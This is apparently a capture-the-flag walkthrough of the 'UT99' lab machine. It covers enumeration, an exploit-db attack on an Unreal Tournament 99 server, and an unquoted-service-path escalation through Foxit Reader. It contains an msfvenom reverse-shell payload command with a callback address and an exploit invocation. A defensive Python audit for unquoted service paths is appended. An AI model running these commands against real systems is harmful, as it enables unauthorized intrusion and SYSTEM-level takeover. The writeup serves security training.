# UT99

## Information Gathering

`sudo ./nmapAutomator.sh 192.168.175.44 all`

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2Fhp2l0FKPCv3ZRsepyo3U%2Fimage.png?alt=media\&token=88466f91-4732-44ed-90bf-2e9132b79fe9)

We also have IRC ports open in the range 6660 to 7000, and 7007.

### Service Enumeration

### FTP (Port 21)

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2F71T1RcNbak9BOU1CLD3j%2Fimage.png?alt=media\&token=77371a5c-1370-4076-8ec7-36fd68de4c69)

We tried various standard login credentials, but none of them worked.

### HTTP (Port 80)

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2F3oVGFqiIf24ebGJ67EFc%2Fimage.png?alt=media\&token=a8046ba5-49df-485d-9f09-129bb4258d08)

Looks like this is running Dragonfly CMS. Manual enumeration led us to conclude this is a dead end.

### IRC Ports (6660-7000 and 7007)

We can install `HexChat IRC Client` using the following command:

`apt-get install hexchat -y`

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FIVgDFuYPxPpAXBksAirF%2Fimage.png?alt=media\&token=17059cb4-cb5f-4e75-96ea-5fa77085dc7f)

We can add a new network and name it however we want. Next, click `Edit` to edit the parameters.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FMxmZVYRUgzQ1XMB3YedG%2Fimage.png?alt=media\&token=8649be0a-5d29-4956-9906-b1ef42ab275f)

Here, add the IP and port number and click close.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2F1b2NlwEAs6W3iMsTjYFG%2Fimage.png?alt=media\&token=a5884eb3-06f1-4290-96b4-b3717ac1a1c6)

Then, we can use any name we want and click connect.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2Fpp8pOZky6xqtfmD7feta%2Fimage.png?alt=media\&token=f3aeb78a-716f-495f-b4af-cca3be340aa2)

Here, we click on the server option and click on ChannelList.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2F7xFpEYFb5ZvDolpKLSzX%2Fimage.png?alt=media\&token=8fbf8813-25ec-4865-9b30-f7acac6a6d21)

Under ChannelList, we can search for channels with 1 to 9999 users, and we see the channel ut99.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FHipOUUSEG7G8ykRN5gsw%2Fimage.png?alt=media\&token=3aeaa071-71bc-421a-8ff2-08ce880bdf0c)

Upon connecting, we see that the Unreal Tournament 99 Game server is hosted on port 7778.

## Exploit

{% embed url="<https://www.exploit-db.com/exploits/16145>" %}

`perl 16145.pl 192.168.175.44 7778 192.168.49.175 80`

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FyttR71OnyS3G3tgK6Gu0%2Fimage.png?alt=media\&token=488504f3-8a62-4d53-b222-61be0a434e45)

## Privesc

`Systeminfo`

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FQbhXQQcGa4lwE4G6HFnT%2Fimage.png?alt=media\&token=97c17e20-df8a-4b5d-ab15-725d4004e19e)

We manually enumerate and find an `ftp` directory.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FpXuBucJ3NxxzfWHeUYvj%2Fimage.png?alt=media\&token=88dacce1-08ca-4bb6-904a-b2710807a6ee)

{% embed url="<https://www.exploit-db.com/exploits/36390>" %}

Looks like this version of Foxit Reader is vulnerable to an unquoted service path privilege escalation. We can check if it is installed.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FaBvSj3O76pblwfD5N4Mu%2Fimage.png?alt=media\&token=77a3e12d-eec1-44ed-a069-28397358eadb)

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FxYcaDLkutinLAaUqYjJq%2Fimage.png?alt=media\&token=4938ba48-a34d-43f8-ab7e-16c3069c6e49)

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FHZit0GgHEIyKMfglP8p2%2Fimage.png?alt=media\&token=20912b92-5e29-40a9-83b1-c4bd913caad6)

Looks like we have write permissions.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FlP5vAhC3n2tIMl2Aw7wQ%2Fimage.png?alt=media\&token=be225144-112c-46ae-9220-985636e892e5)

So let's generate our payload, named Foxit.exe.

`msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.175 LPORT=80 -f exe -o Foxit.exe`

Then, we transfer our file to the target machine.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FQL6XHqDSMaY6zELyxkSo%2Fimage.png?alt=media\&token=7b580577-3fa3-4cef-8ccf-dbb85636fcf4)

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FOg1x923gainjwupe0qc3%2Fimage.png?alt=media\&token=dded8196-f89c-4c8d-9a80-fce12aacab6a)

Next, we reboot the machine, and when the service starts again we get SYSTEM.

`shutdown -r -t 5 && exit`

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FgsTymIt31HqFXwfPl389%2Fimage.png?alt=media\&token=4e331a55-cddb-43fc-b884-968a957198be)
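The privilege escalation above depends on a service `ImagePath` that is unquoted and contains spaces, so Windows tries shorter truncated paths before the real binary. The following Python audit is an added example, not part of the original write-up: it takes exported service records, lists the directories whose write permissions need review, and produces the quoted `ImagePath` that removes the ambiguity. The service names and paths are constructed samples, and the function names are hypothetical.

```python
import ntpath
import re

# Constructed sample records (service name, ImagePath); not taken from the target.
SERVICES = [
    ("ExampleUpdater", r"C:\Program Files\Example Vendor\Update Agent\agent.exe /svc"),
    ("QuotedAgent", r'"C:\Program Files\Example Vendor\Update Agent\agent.exe" /svc'),
    ("HostedSvc", r"C:\Windows\system32\svchost.exe -k netsvcs -p"),
]

EXE_END = re.compile(r"\.exe(?=\s|$)", re.IGNORECASE)


def executable_part(image_path):
    """Split an ImagePath into (is_quoted, executable path without arguments)."""
    p = image_path.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        return True, p[1:end] if end != -1 else p[1:]
    m = EXE_END.search(p)
    return False, p[:m.end()] if m else p.split(" ")[0]


def interim_candidates(image_path):
    """Paths Windows tries before the real binary when the path is unquoted."""
    quoted, exe = executable_part(image_path)
    if quoted:
        return []
    found = []
    for i, ch in enumerate(exe):
        if ch == " ":
            prefix = exe[:i]
            # Windows appends .exe when the truncated name has no extension.
            has_ext = "." in ntpath.basename(prefix)
            found.append(prefix if has_ext else prefix + ".exe")
    return found


def audit(services):
    """Return {service: {"review_dirs": [...], "fixed": quoted ImagePath}}."""
    report = {}
    for name, image_path in services:
        candidates = interim_candidates(image_path)
        if not candidates:
            continue
        _, exe = executable_part(image_path)
        args = image_path.strip()[len(exe):]
        dirs = sorted({ntpath.dirname(c) for c in candidates})
        report[name] = {"review_dirs": dirs, "fixed": f'"{exe}"{args}'}
    return report
```

Any directory in `review_dirs` that non-administrative users can write to makes the finding exploitable; quoting the `ImagePath` as in `fixed` closes it regardless of those permissions.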
